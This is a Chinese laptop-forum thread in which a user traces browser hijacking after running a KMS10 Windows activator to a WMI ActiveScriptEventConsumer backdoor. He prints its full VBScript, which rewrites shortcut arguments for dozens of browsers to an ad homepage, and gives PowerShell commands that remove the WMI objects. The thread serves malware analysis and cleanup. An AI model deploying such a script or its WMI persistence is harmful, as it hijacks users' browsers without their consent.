找回密码
 注册
快捷导航
查看: 27320|回复: 85

【原创】用了KMS10中招, 浏览器老被加尾巴怎么办, 看过来

    [复制链接] |自动提醒
阅读字号:

930

回帖

22

积分

9060

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2004-7-12
铜牌荣誉勋章(注册8年以上会员)
发表于 2016-3-20 15:47:18| 字数 2,556| - 广东省深圳市 电信 | 显示全部楼层 |阅读模式
本帖最后由 sheds 于 2016-5-7 08:30 编辑

装了Win10, 要激活, 于是论坛下载了一个KMS10激活, (我是很相信论坛的啊, 没想到...)
结果浏览器总是被加小尾巴跳转到hao123

系统目录的KMS10文件夹删除了, 注册表搜索删除了. 快捷方式手动清理干净了, 可是没用啊
没用啊, 怎么办... Explorer进程加载的DLL 系统服务, 观察一圈没发现异常啊.  网上百度, Google好多圈
一点用也没, 都是些抄来抄去的贴子.  重装系统, 这不符合我的风格呀(其实是软件太多, 重装太麻烦)

于是装了一个火绒(这里没有推广的意思,本来想装个COMODO的, 结果不支持WIN10), 用HIPS发现

scrcons.exe 他在修改快捷方式. 于是百度之, 引出来WMI, 仔细一看, 乖乖, 三无后门
(“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer)


于是网上下载了一个工具WIMExplorer 这里贴个下载地址 http://www.ks-soft.net/hostmon.eng/wmi/
一看 ActiveScriptEventConsumer 里面果然有一个vbs脚本再一看内容, 这不正是查找多日的小尾巴吗, 果断删除
从此世界清静了

看看小尾巴的脚本
  1. On Error Resume Next
  2. Const link = "http://hao.qquu8.com/?v=108&m=yx"
  3. Const link360 = "http://hao.qquu8.com/?v=108&m=yx&s=3"
  4. browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
  5. lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
  6. browsersArr = Split(browsers,",")
  7. Set oDic = CreateObject("scripting.dictionary")
  8. For Each browser In browsersArr
  9.     oDic.Add LCase(browser), browser
  10. Next
  11. lnkpathsArr = Split(lnkpaths,",")
  12. Set oFolders = CreateObject("scripting.dictionary")
  13. For Each lnkpath In lnkpathsArr
  14.     oFolders.Add lnkpath, lnkpath
  15. Next
  16. Set fso = CreateObject("Scripting.Filesystemobject")
  17. Set WshShell = CreateObject("Wscript.Shell")
  18. For Each oFolder In oFolders
  19.     If fso.FolderExists(oFolder) Then
  20.         For Each file In fso.GetFolder(oFolder).Files
  21.             If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
  22.                 Set oShellLink = WshShell.CreateShortcut(file.Path)
  23.                 path = oShellLink.TargetPath
  24.                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
  25.                 If oDic.Exists(LCase(name)) Then
  26.                     If LCase(name) = LCase("360se.exe") Then
  27.                         oShellLink.Arguments = link360
  28.                     Else
  29.                         oShellLink.Arguments = link
  30.                     End If
  31.                     If file.Attributes And 1 Then
  32.                         file.Attributes = file.Attributes - 1
  33.                     End If
  34.                     oShellLink.Save
  35.                 End If
  36.             End If
  37.         Next
  38.     End If
  39. Next
复制代码

WMI查看工具


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x

评分

参与人数 1资产值 +10 收起 理由
ycren + 10 赞一个!

查看全部评分

T42 23738YH \PM1.7 \RADEON 9600 64M \HDD 80G \RAM 1G
T420 4180RW1\I5-2540M \500G\RAM 8G

3万

回帖

2

积分

-462

资产值

初级会员 Rank: 1

注册时间
2002-11-20
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
发表于 2016-3-20 15:49:53| 字数 55| - 上海市普陀区 电信 | 显示全部楼层
不用下载任何工具

看清楚后缀是什么,注册表和c盘windows文件夹里删干净

桌面IE快捷方式删掉,换个纯净的上去
回复 支持 反对

使用道具 举报

930

回帖

22

积分

9060

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2004-7-12
铜牌荣誉勋章(注册8年以上会员)
 楼主| 发表于 2016-3-20 15:50:44| 字数 39| - 广东省深圳市 电信 | 显示全部楼层
除非你重装系统, 否则你查找文件注册表绝对找不到这个东西
不相信你下载一个激活试试
T42 23738YH \PM1.7 \RADEON 9600 64M \HDD 80G \RAM 1G
T420 4180RW1\I5-2540M \500G\RAM 8G
回复 支持 反对

使用道具 举报

3万

回帖

2

积分

-462

资产值

初级会员 Rank: 1

注册时间
2002-11-20
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
发表于 2016-3-20 15:57:19| 字数 137| - 上海市普陀区 电信 | 显示全部楼层
QUOTE:
sheds 发表于 2016-3-20 15:50
除非你重装系统, 否则你查找文件注册表绝对找不到这个东西
不相信你下载一个激活试试

别说这么绝对,这个月刚把一台机器里的IE改好了

也是在软件区下载了软件,然后中招

主页被改成了hao123,IE地址后缀是四个字母,具体记不得了
回复 支持 反对

使用道具 举报

4864

回帖

91

积分

9万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2009-9-9
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2016-3-20 15:58:24| 字数 40| - 福建省福州市 电信 | 显示全部楼层
无孔不入啊 从WIN7年代到WIN10都是裸奔啊。。。。不知道后续会不会不小心中招
AW13 I5/16G/860EVO2T/GTX860M2G/BT/camera
回复 支持 反对

使用道具 举报

2924

回帖

53

积分

5349

资产值

VIP Rank: 5Rank: 5Rank: 5Rank: 5Rank: 5

注册时间
2012-2-18
发表于 2016-3-20 16:08:24| 字数 19| - 俄罗斯 | 显示全部楼层
和相信不相信论坛有什么关系 ,真是够矫情
回复 支持 反对

使用道具 举报

930

回帖

22

积分

9060

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2004-7-12
铜牌荣誉勋章(注册8年以上会员)
 楼主| 发表于 2016-3-20 16:16:48| 字数 62| - 广东省深圳市 电信 | 显示全部楼层
QUOTE:
aspan 发表于 2016-3-20 16:08
和相信不相信论坛有什么关系 ,真是够矫情

只是一个玩笑话, 看来是我矫情了
T42 23738YH \PM1.7 \RADEON 9600 64M \HDD 80G \RAM 1G
T420 4180RW1\I5-2540M \500G\RAM 8G
回复 支持 反对

使用道具 举报

4037

回帖

63

积分

3万

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2011-4-10
月全勤勋章
发表于 2016-3-20 16:18:37| 字数 104| - 山东省青岛市 联通 | 显示全部楼层
QUOTE:
sheds 发表于 2016-3-20 15:47
装了Win10, 要激活, 于是论坛下载了一个KMS10激活, (我是很相信论坛的啊, 没想到...)
结果浏览器总是被加 ...

具体是咋操作的?用文本编辑器?谢谢
回复 支持 反对

使用道具 举报

2541

回帖

79

积分

2万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2007-8-14
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)月全勤勋章
发表于 2016-3-20 16:35:05| 字数 29| - 安徽省合肥市瑶海区 电信 | 显示全部楼层
楼主分享一个详细的步骤呗。同样的问题,浏览器被加小尾巴了。
Y9000K I7-12800HX 16G RTX3070Ti 2.5K 165Hz
R9000P R9-6900HX  32G RTX3070Ti 2.5K 165Hz
回复 支持 反对

使用道具 举报

930

回帖

22

积分

9060

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2004-7-12
铜牌荣誉勋章(注册8年以上会员)
 楼主| 发表于 2016-3-20 16:55:18| 字数 655| - 广东省深圳市 电信 | 显示全部楼层
本帖最后由 sheds 于 2016-7-24 23:12 编辑

删除方法:

我这里的情况是如图这样的,用下面的命令方式可以删除病毒

以管理员身份运行PowerShell
执行以下命令(4条命令复制粘贴然后一起执行即可)

gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x

点评

很给力,只是我的火狐只是删除了快捷方式,然后直接从安装文件新建快捷方式就避免了这个结果~~嘿嘿  详情 回复 发表于 2017-2-8 11:21
非常给力,只是用www.bing.com搜索的时候还是会劫持到百度显示结果。 另外win10怎么激活  详情 回复 发表于 2016-12-1 20:43
回复@learndozen : 要先把系统目录的KMS文件删除了, 再执行命令改这个, 注意以管理员身份运行  详情 回复 发表于 2016-11-2 23:29
好像执行后没反应,用WMIView还是看到那个可恶的脚 本,是哪里搞错了?  详情 回复 发表于 2016-11-2 12:12

评分

参与人数 1资产值 +10 收起 理由
larryh + 10 很给力!

查看全部评分

T42 23738YH \PM1.7 \RADEON 9600 64M \HDD 80G \RAM 1G
T420 4180RW1\I5-2540M \500G\RAM 8G
回复 支持 7 反对

使用道具 举报

385

回帖

8

积分

2654

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2014-12-15
发表于 2016-3-20 17:05:01| 字数 20| - 海南省海口市 移动 | 显示全部楼层
我的小尾巴好久了都没去掉,下了班回去搞起
回复 支持 1 反对

使用道具 举报

1万

回帖

228

积分

13万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-2-28
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)月全勤勋章银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)
发表于 2016-3-20 18:13:20| 字数 6| - 河南省平顶山市 电信 来自手机版 | 显示全部楼层
学习新知识。
回复 支持 反对

使用道具 举报

4037

回帖

63

积分

3万

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2011-4-10
月全勤勋章
发表于 2016-3-20 20:01:30| 字数 78| - 山东省青岛市 联通 | 显示全部楼层
QUOTE:
sheds 发表于 2016-3-20 16:55
我这里的情况是如图这样的,你下面的命令方式可以解决

以管理员身份运行PowerShell

谢谢,看明白了
回复 支持 反对

使用道具 举报

3664

回帖

36

积分

3万

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2013-5-24
发表于 2016-3-20 22:13:02| 字数 18| - 云南省昆明市 联通 | 显示全部楼层
学习了,曾经多次中招,不得已重装了事
回复 支持 反对

使用道具 举报

1813

回帖

34

积分

2万

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2014-1-30
发表于 2016-3-21 00:21:34| 字数 74| - 河南省三门峡市义马市 联通 | 显示全部楼层
学习了,曾经出现过这种情况,因为系统装有360全家桶,但是360查不出来,找了360的工作人员,他远程各种工具查找问题没找到,最后还是重装系统了事。
legion r7000 r7-5800h 16g*2 3050ti
回复 支持 反对

使用道具 举报

6236

回帖

87

积分

2万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2007-11-15
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2016-3-21 09:43:39| 字数 108| - 福建省福州市 电信 | 显示全部楼层
本帖最后由 277266 于 2016-3-21 10:05 编辑

看不明白啊!

找到了powershell,谢谢!希望能永远解决,被困扰很久很久了。

无数次诅咒这个网址和这个流氓软件。

中国软件业就是被周红衣这种流氓带向流氓方向的!
回复 支持 反对

使用道具 举报

4610

回帖

118

积分

4万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2005-6-30
铜牌荣誉勋章(注册8年以上会员)月全勤勋章银牌荣誉勋章(注册10年以上会员)
发表于 2016-3-21 10:08:18| 字数 83| - 江苏省苏州市太仓市 电信/ | 显示全部楼层
本帖最后由 labazhou 于 2016-3-21 18:05 编辑

前段时间也遇到了,这次回家试一下回家测试了一下,果然有这种情况,以前试了好多方法都没有办法,还是51NB好
新年新努力!
回复 支持 反对

使用道具 举报

119

回帖

9

积分

1万

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2003-7-25
铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2016-3-24 08:19:33| 字数 8| - 广东省广州市 联通 | 显示全部楼层
学习了,也中过招
回复 支持 反对

使用道具 举报

6236

回帖

87

积分

2万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2007-11-15
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2016-3-24 09:46:57| 字数 144| - 福建省福州市 电信 | 显示全部楼层
QUOTE:
edgu 发表于 2016-3-20 15:57
别说这么绝对,这个月刚把一台机器里的IE改好了

也是在软件区下载了软件,然后中招

过几天又不行了!呵呵.....。

当然,有可能你遇到并不是楼主说的这种情况。

如果是楼主说这种情况是绝对地。小马激活刚出来时,觉得挺不错的,原来就是百度养的狗!
回复 支持 反对

使用道具 举报

399

回帖

22

积分

6491

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2004-8-3
发表于 2016-3-24 21:14:38| 字数 10| - 北京市 联通 | 显示全部楼层
非常感谢,困扰很久了
回复 支持 反对

使用道具 举报

6236

回帖

87

积分

2万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2007-11-15
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2016-3-25 08:42:01| 字数 11| - 福建省福州市 电信 | 显示全部楼层
我怎么没有显示10楼?
回复 支持 反对

使用道具 举报

1

回帖

0

积分

56

资产值

入门会员 Rank: 1

注册时间
2016-3-30
发表于 2016-3-30 10:37:43| 字数 10| - 广东省深圳市 电信 | 显示全部楼层
谢谢,楼主,完美解决
回复 支持 反对

使用道具 举报

41

回帖

1

积分

934

资产值

初级会员 Rank: 1

注册时间
2015-12-7
发表于 2016-3-30 16:40:37| 字数 7| - 广西 移动数据上网公共出口 来自手机版 | 显示全部楼层
这么好,谢了!
回复 支持 反对

使用道具 举报

695

回帖

9

积分

1500

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2006-5-23
发表于 2016-3-31 15:52:09| 字数 22| - 广东省深圳市 电信 | 显示全部楼层
為什麼我測試不行啊一固定到狀態欄就馬上出現了
回复 支持 反对

使用道具 举报

zhangyongtao - 液晶屏改装

8万

回帖

669

积分

4万

资产值

天下无敌I Rank: 5Rank: 5Rank: 5Rank: 5Rank: 5

注册时间
2003-12-21
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章银牌荣誉勋章(注册10年以上会员)金牌荣誉勋章(注册20年以上会员)
发表于 2016-3-31 15:57:27| 字数 18| - 河南省郑州市 电信 | 显示全部楼层
最烦WINDOWS 这一点  
一不小心就中
各种屏幕改装,2K 4K改装服务       B站:西莫迪 ,旺旺:液晶服务 微信号:lcdfans QQ21144474
X1C 2018 i7 16G 1T 2K/P53 I7-64G-6T-4K HDR/X2100 I7-10710U
回复 支持 反对

使用道具 举报

1万

回帖

110

积分

1万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2007-9-20
银牌荣誉勋章(注册10年以上会员)
发表于 2016-4-2 20:11:51| 字数 15| - 广东省湛江市 电信 | 显示全部楼层
用360治疗这个还是很有效果的
S230U
回复 支持 反对

使用道具 举报

2087

回帖

45

积分

6万

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2005-9-15
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)月全勤勋章
发表于 2016-4-8 23:23:41| 字数 3| - 广东省广州市 电信 | 显示全部楼层
不会用
Before:X21-X30-T40-T41-R51-T60-T61-X200-X230T-X1C
Now:T450S+R720+YOGA260
回复 支持 反对

使用道具 举报

1万

回帖

155

积分

2万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2008-1-10
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
发表于 2016-4-9 02:04:44| 字数 4| - 四川省成都市 联通 | 显示全部楼层
good
回复 支持 反对

使用道具 举报

1万

回帖

155

积分

2万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2008-1-10
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
发表于 2016-4-11 11:59:43| 字数 33| - 四川省遂宁市 电信 | 显示全部楼层
下了wmiexplorer但是弄不来,界面和2楼截图完全不一样啊。
回复 支持 反对

使用道具 举报

6910

回帖

145

积分

2万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2015-12-14
月全勤勋章
发表于 2016-4-11 16:37:25| 字数 18| - 广东省深圳市 电信 | 显示全部楼层
刚好遇到这个问题,按楼主方式尝试一下
Live healthier and achieve more.
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Powered by Discuz! X3.5 © 2001-2023 Comsenz Inc

GMT+8, 2024-5-7 05:22 , Processed in 0.209550 second(s), 87 queries , Gzip On, OPcache On.

手机版|小黑屋|安卓客户端|iOS客户端|Archiver|备用网址1|备用网址2|在线留言|专门网

返回顶部